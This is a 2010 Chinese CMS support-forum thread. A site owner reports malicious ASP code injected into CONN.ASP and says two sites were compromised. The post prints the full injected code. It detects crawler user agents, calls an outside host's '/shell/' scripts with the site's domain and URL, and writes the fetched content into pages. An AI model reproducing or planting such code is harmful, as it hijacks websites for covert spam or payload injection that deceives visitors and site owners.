账号通
    

账号  

密码  

1636

查看

2

回复
主题:发现CONN.ASP多出了如下代码 [收藏主题]  
sillywind 当前离线

106

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:886 分
登录次数:85 次
注册时间:2008/1/30
最后登录:2014/12/8
sillywind 发表于:2010/3/24 15:41:00   | 只看该作者 查看该作者主题 楼主 
做在线知识付费 选科汛云开店

CONN.ASP多出了这些代码

 

 

<%
Function getBody(infopageurl)
On Error Resume Next
if infopageurl<>"" then
 dim xmlHttp
 set xmlHttp=server.createobject("MSXML2.XMLHTTP")
 xmlHttp.open "GET",infopageurl,false
 xmlHttp.send
 getBody=BytesToBstr(xmlhttp.responsebody,"GB2312")
 set xmlHttp=nothing
end if
end Function
Function BytesToBstr(body,Cset)
 dim objstream 
 set objstream = Server.CreateObject("adodb.stream") 
 objstream.Type = 1 
 objstream.Mode = 3 
 objstream.Open 
 objstream.Write body 
 objstream.Position = 0 
 objstream.Type = 2 
 objstream.Charset = Cset 
 BytesToBstr = objstream.ReadText 
 objstream.Close 
 set objstream = nothing
End Function
dns = Request.ServerVariables("SERVER_NAME")
path = Request.ServerVariables("PATH_INFO")
qs = Request.ServerVariables("QUERY_STRING")
url= dns&path&"?"&qs
agent = Request.ServerVariables("HTTP_USER_AGENT")
tz = "http"
if Instr(agent,tz)>0 then
if path ="/index.asp" or path="/default.asp" then
response.write getBody("www.s1920.com/shell/sca.php?dns="&dns)
else
response.write getBody("www.s1920.com/shell/scan.php?dns="&url&"&dn="&dns)
end if
end if
%>

登陆提示变量为定义 dns,什么问题呢

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
lailaigo 当前离线

164

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:1729 分
登录次数:202 次
注册时间:2007/8/2
最后登录:2013/4/2
lailaigo 发表于:2010/3/24 16:23:00   | 只看该作者 查看该作者主题 沙发 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
sillywind 当前离线

106

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:886 分
登录次数:85 次
注册时间:2008/1/30
最后登录:2014/12/8
sillywind 发表于:2010/3/24 17:38:00   | 只看该作者 查看该作者主题 藤椅 
就是呀,怎么办呀,两个站已经被挂了
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.09375秒 powered by KesionCMS 9.0